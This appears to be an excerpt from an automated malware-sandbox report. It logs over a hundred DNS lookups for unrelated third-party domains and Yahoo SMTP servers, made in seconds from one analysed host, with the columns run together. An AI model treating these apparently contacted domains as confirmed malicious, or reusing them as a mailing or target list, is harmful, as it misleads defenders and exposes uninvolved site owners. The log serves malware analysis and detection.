                                                                                                                                                                              Sep 15, 2023 07:28:09.932075024 CEST192.168.2.38.8.8.80x13f6Standard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.104684114 CEST192.168.2.38.8.8.80x88acStandard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.104684114 CEST192.168.2.38.8.8.80x1b22Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.105089903 CEST192.168.2.38.8.8.80x1b7dStandard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.204150915 CEST192.168.2.38.8.8.80x94c7Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.312186003 CEST192.168.2.38.8.8.80x8356Standard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.328135014 CEST192.168.2.38.8.8.80x9076Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.670039892 CEST192.168.2.38.8.8.80xc678Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.682508945 CEST192.168.2.38.8.8.80xdde9Standard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.760575056 CEST192.168.2.38.8.8.80x94b5Standard query (0)smtp.mail.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.796302080 CEST192.168.2.38.8.8.80x2803Standard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.800462961 CEST192.168.2.38.8.8.80x50d2Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.844250917 CEST192.168.2.38.8.8.80x31fStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.845242023 CEST192.168.2.38.8.8.80x20f5Standard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.856596947 CEST192.168.2.38.8.8.80x2086Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.885821104 CEST192.168.2.38.8.8.80x53c7Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:10.984127045 CEST192.168.2.38.8.8.80xc0afStandard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.118940115 CEST192.168.2.38.8.8.80x88acStandard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.220648050 CEST192.168.2.38.8.8.80x119cStandard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.231575966 CEST192.168.2.38.8.8.80xe6f0Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.333029032 CEST192.168.2.38.8.8.80x79baStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.416640043 CEST192.168.2.38.8.8.80xc63eStandard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.432483912 CEST192.168.2.38.8.8.80x1f4eStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.641611099 CEST192.168.2.38.8.8.80x9833Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.702327013 CEST192.168.2.38.8.8.80x8df5Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.734195948 CEST192.168.2.38.8.8.80xf4acStandard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.756995916 CEST192.168.2.38.8.8.80xedd3Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.778357983 CEST192.168.2.38.8.8.80x5e15Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.794215918 CEST192.168.2.38.8.8.80x303cStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.868839979 CEST192.168.2.38.8.8.80x2086Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.882464886 CEST192.168.2.38.8.8.80xc036Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.885385036 CEST192.168.2.38.8.8.80x1dfeStandard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.948275089 CEST192.168.2.38.8.8.80x5f32Standard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:11.979429960 CEST192.168.2.38.8.8.80x27f7Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.134603977 CEST192.168.2.38.8.8.80x88acStandard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.166817904 CEST192.168.2.38.8.8.80x9d08Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.201334953 CEST192.168.2.38.8.8.80x7416Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.309787989 CEST192.168.2.38.8.8.80x2a23Standard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.348426104 CEST192.168.2.38.8.8.80xc8e6Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.634704113 CEST192.168.2.38.8.8.80x9833Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.729389906 CEST192.168.2.38.8.8.80x27a4Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.776133060 CEST192.168.2.38.8.8.80xbdfbStandard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:12.854909897 CEST192.168.2.38.8.8.80x1106Standard query (0)smtp.sbcglobal.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:13.333992004 CEST192.168.2.38.8.8.80xcf8cStandard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:13.480828047 CEST192.168.2.38.8.8.80x462aStandard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:13.513633966 CEST192.168.2.38.8.8.80x95cStandard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:13.650722027 CEST192.168.2.38.8.8.80x9833Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:13.775989056 CEST192.168.2.38.8.8.80xf540Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:14.155316114 CEST192.168.2.38.8.8.80x8691Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:14.230951071 CEST192.168.2.38.8.8.80xd76eStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:14.873591900 CEST192.168.2.38.8.8.80xeabeStandard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:14.950601101 CEST192.168.2.38.8.8.80x331aStandard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:15.243849039 CEST192.168.2.38.8.8.80xd76eStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:15.278913975 CEST192.168.2.38.8.8.80x595eStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:15.377155066 CEST192.168.2.38.8.8.80xd75Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:15.438643932 CEST192.168.2.38.8.8.80x6d82Standard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:15.480395079 CEST192.168.2.38.8.8.80xc8aaStandard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:15.779102087 CEST192.168.2.38.8.8.80xa8f7Standard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:15.822958946 CEST192.168.2.38.8.8.80x2e0eStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:15.920906067 CEST192.168.2.38.8.8.80xc6f5Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.082482100 CEST192.168.2.38.8.8.80xeb96Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.279490948 CEST192.168.2.38.8.8.80xd76eStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.303366899 CEST192.168.2.38.8.8.80xe64cStandard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.303366899 CEST192.168.2.38.8.8.80x34ecStandard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.303366899 CEST192.168.2.38.8.8.80x3203Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.303366899 CEST192.168.2.38.8.8.80xd638Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.304049969 CEST192.168.2.38.8.8.80x6bebStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.307449102 CEST192.168.2.38.8.8.80x2ec7Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.307449102 CEST192.168.2.38.8.8.80xbf36Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.307449102 CEST192.168.2.38.8.8.80x8beStandard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.307449102 CEST192.168.2.38.8.8.80x8f6fStandard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.312119961 CEST192.168.2.38.8.8.80x2758Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.312119961 CEST192.168.2.38.8.8.80x6432Standard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.313920021 CEST192.168.2.38.8.8.80xc98Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.315177917 CEST192.168.2.38.8.8.80xd24dStandard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.315177917 CEST192.168.2.38.8.8.80x9d2aStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.315177917 CEST192.168.2.38.8.8.80xf06dStandard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.315177917 CEST192.168.2.38.8.8.80x842bStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.315541983 CEST192.168.2.38.8.8.80x1331Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.315541983 CEST192.168.2.38.8.8.80x55aaStandard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.318320990 CEST192.168.2.38.8.8.80xe054Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.318320990 CEST192.168.2.38.8.8.80x5694Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.318368912 CEST192.168.2.38.8.8.80x98f3Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.318707943 CEST192.168.2.38.8.8.80xc538Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.324115992 CEST192.168.2.38.8.8.80x3addStandard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.324115992 CEST192.168.2.38.8.8.80xa488Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.324115992 CEST192.168.2.38.8.8.80x1b7eStandard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.339648008 CEST192.168.2.38.8.8.80x93bcStandard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.339648008 CEST192.168.2.38.8.8.80x7a05Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.345371008 CEST192.168.2.38.8.8.80xb81aStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.345371008 CEST192.168.2.38.8.8.80xbb55Standard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.345371008 CEST192.168.2.38.8.8.80xfb15Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.345371008 CEST192.168.2.38.8.8.80x183fStandard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.345818996 CEST192.168.2.38.8.8.80x822cStandard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.348082066 CEST192.168.2.38.8.8.80x9a3bStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.351536989 CEST192.168.2.38.8.8.80x215bStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.351536989 CEST192.168.2.38.8.8.80xdae9Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.352184057 CEST192.168.2.38.8.8.80x1d9eStandard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.354041100 CEST192.168.2.38.8.8.80xfa5fStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.354041100 CEST192.168.2.38.8.8.80x5e2bStandard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.354041100 CEST192.168.2.38.8.8.80x38d6Standard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.354109049 CEST192.168.2.38.8.8.80x38a9Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.356117010 CEST192.168.2.38.8.8.80x2035Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.357851028 CEST192.168.2.38.8.8.80x5ee0Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.357851028 CEST192.168.2.38.8.8.80x2ae2Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.358922005 CEST192.168.2.38.8.8.80xd9f0Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.358922005 CEST192.168.2.38.8.8.80xf9eeStandard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.360374928 CEST192.168.2.38.8.8.80x6149Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.360374928 CEST192.168.2.38.8.8.80x9dfeStandard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.360374928 CEST192.168.2.38.8.8.80xa25cStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.360718012 CEST192.168.2.38.8.8.80x8cc6Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.361541986 CEST192.168.2.38.8.8.80x9ac1Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.361541986 CEST192.168.2.38.8.8.80x9dfcStandard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.361541986 CEST192.168.2.38.8.8.80xbdcaStandard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.362221956 CEST192.168.2.38.8.8.80xca26Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.362221956 CEST192.168.2.38.8.8.80xe632Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.363284111 CEST192.168.2.38.8.8.80x992cStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.368078947 CEST192.168.2.38.8.8.80x64ceStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.369728088 CEST192.168.2.38.8.8.80x2656Standard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.369728088 CEST192.168.2.38.8.8.80x3aafStandard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.403398037 CEST192.168.2.38.8.8.80x47a6Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.403398037 CEST192.168.2.38.8.8.80xb69Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.403398037 CEST192.168.2.38.8.8.80xb9d3Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.405839920 CEST192.168.2.38.8.8.80xac1fStandard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.405878067 CEST192.168.2.38.8.8.80xbe08Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.407263994 CEST192.168.2.38.8.8.80x7279Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.407263994 CEST192.168.2.38.8.8.80x2311Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.407702923 CEST192.168.2.38.8.8.80x3dc9Standard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.408304930 CEST192.168.2.38.8.8.80x64e0Standard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.410702944 CEST192.168.2.38.8.8.80x6d31Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.410702944 CEST192.168.2.38.8.8.80xabdStandard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.413249969 CEST192.168.2.38.8.8.80x1defStandard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.422277927 CEST192.168.2.38.8.8.80x33c1Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.450450897 CEST192.168.2.38.8.8.80xfaa7Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.492471933 CEST192.168.2.38.8.8.80x8220Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.528276920 CEST192.168.2.38.8.8.80x9771Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.529423952 CEST192.168.2.38.8.8.80x31a8Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.535568953 CEST192.168.2.38.8.8.80xe980Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.552135944 CEST192.168.2.38.8.8.80xbb4bStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.591157913 CEST192.168.2.38.8.8.80x60fcStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.635724068 CEST192.168.2.38.8.8.80x582aStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.640117884 CEST192.168.2.38.8.8.80xf580Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.643805027 CEST192.168.2.38.8.8.80x2bfcStandard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.661024094 CEST192.168.2.38.8.8.80xb988Standard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.685281038 CEST192.168.2.38.8.8.80x4e0fStandard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.686126947 CEST192.168.2.38.8.8.80x6b35Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.687120914 CEST192.168.2.38.8.8.80xb373Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.702702045 CEST192.168.2.38.8.8.80xf834Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.724116087 CEST192.168.2.38.8.8.80x1631Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.738154888 CEST192.168.2.38.8.8.80x6776Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.777314901 CEST192.168.2.38.8.8.80x9d21Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.777626991 CEST192.168.2.38.8.8.80xbc22Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.782402992 CEST192.168.2.38.8.8.80x7124Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.786653996 CEST192.168.2.38.8.8.80xb564Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.798332930 CEST192.168.2.38.8.8.80x582dStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.814218998 CEST192.168.2.38.8.8.80x36f8Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.833816051 CEST192.168.2.38.8.8.80x449Standard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.844566107 CEST192.168.2.38.8.8.80x678cStandard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.847402096 CEST192.168.2.38.8.8.80xe2b0Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.851495028 CEST192.168.2.38.8.8.80x3886Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.854036093 CEST192.168.2.38.8.8.80x5d3aStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.862855911 CEST192.168.2.38.8.8.80x4fe3Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.871654034 CEST192.168.2.38.8.8.80x31b0Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.883054972 CEST192.168.2.38.8.8.80xaf90Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.886245966 CEST192.168.2.38.8.8.80x45eeStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.895903111 CEST192.168.2.38.8.8.80x4c89Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.915010929 CEST192.168.2.38.8.8.80x6aaeStandard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.922481060 CEST192.168.2.38.8.8.80x7bffStandard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.929905891 CEST192.168.2.38.8.8.80x2c15Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.934237003 CEST192.168.2.38.8.8.80x59edStandard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.947036982 CEST192.168.2.38.8.8.80x8532Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.950223923 CEST192.168.2.38.8.8.80x43c9Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.953807116 CEST192.168.2.38.8.8.80x4815Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.961169958 CEST192.168.2.38.8.8.80x2deStandard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.966208935 CEST192.168.2.38.8.8.80x5867Standard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.974276066 CEST192.168.2.38.8.8.80x757bStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.986434937 CEST192.168.2.38.8.8.80x28d6Standard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.989541054 CEST192.168.2.38.8.8.80x50eaStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.992336035 CEST192.168.2.38.8.8.80xed50Standard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.993416071 CEST192.168.2.38.8.8.80xed75Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:16.996112108 CEST192.168.2.38.8.8.80x21a5Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.018894911 CEST192.168.2.38.8.8.80x1fc4Standard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.021678925 CEST192.168.2.38.8.8.80x66dcStandard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.054064989 CEST192.168.2.38.8.8.80x1b1eStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.054064989 CEST192.168.2.38.8.8.80xbb70Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.058733940 CEST192.168.2.38.8.8.80xe20Standard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:17.087265015 CEST192.168.2.38.8.8.80x7681Standard query (0)averwin.comA (IP address)IN (0x0001)false
